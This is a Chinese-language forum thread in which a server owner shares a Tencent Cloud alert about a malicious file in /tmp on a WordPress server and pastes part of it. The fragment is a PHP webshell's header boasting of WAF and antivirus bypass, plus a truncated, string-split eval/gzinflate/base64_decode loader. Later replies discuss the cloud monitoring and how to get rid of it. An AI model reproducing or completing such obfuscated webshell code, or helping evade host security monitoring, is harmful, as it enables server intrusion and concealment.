威胁等级：严重，您的服务器疑似被黑客入侵

飞鱼8

【腾讯云】尊敬的腾讯云用户，您好！您的腾讯云账号（账号ID：1xxxxxxx，昵称：xxxxx）下的服务器：10.0.xxxx [Ubuntu-zwgH]，实例ID：，地域：华南地区 (广州)，时间：2022-07-10 01:23:10，检测到存在待处理的恶意文件：/tmp/phpxr8twB，威胁等级：严重，您的服务器疑似被黑客入侵，避免造成严重损失，请前往主机安全控制台查看详细信息。

腾讯清凉云的宝塔系统＋ｗｏｒｄｐｒｅｓｓ
两台都有提示了


１８ｃｍ们　　这是啥情况

截取部分代码
loc好像装了安全狗   全部代码发不出来
xxxxxx

//本次更新：体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色：PHP高版本低版本都能执行，文件短小精悍，方便上传，功能强大，提权无痕迹，无视waf，过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。

$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'.xxxxxxxx

fff3ggg

腾讯帮你扫描系统，检测到了恶意文件：/tmp/phpxr8twB
看不能不能删掉。

flipwalls

网址多少，看看

深巷老猫i

这玩意贼拉牛逼 我装进去马上就发邮件过来了 就是不知道怎么才能搞掉他的这个监控

WZ-Software

深巷老猫i 发表于 2022-7-10 11:03
这玩意贼拉牛逼 我装进去马上就发邮件过来了 就是不知道怎么才能搞掉他的这个监控 ...

这个东西具体作用是啥啊

深巷老猫i

WZ-Software 发表于 2022-7-10 11:05
这个东西具体作用是啥啊

监控你有没有干坏事的 顺便取证

飞鱼8

深巷老猫i 发表于 2022-7-10 11:03
这玩意贼拉牛逼 我装进去马上就发邮件过来了 就是不知道怎么才能搞掉他的这个监控 ...

自动删除 新建的文件  也挺好

toot

找理由赶下车。随意查看你的服务器文件。狗腾讯还能用啊？

WZ-Software

深巷老猫i 发表于 2022-7-10 11:17
监控你有没有干坏事的 顺便取证

我说那个php啥的那个文件

chxin

深巷老猫i 发表于 2022-7-10 11:03
这玩意贼拉牛逼 我装进去马上就发邮件过来了 就是不知道怎么才能搞掉他的这个监控 ...

母鸡级别的扫描，你根本搞不掉的，除非搞到母鸡权限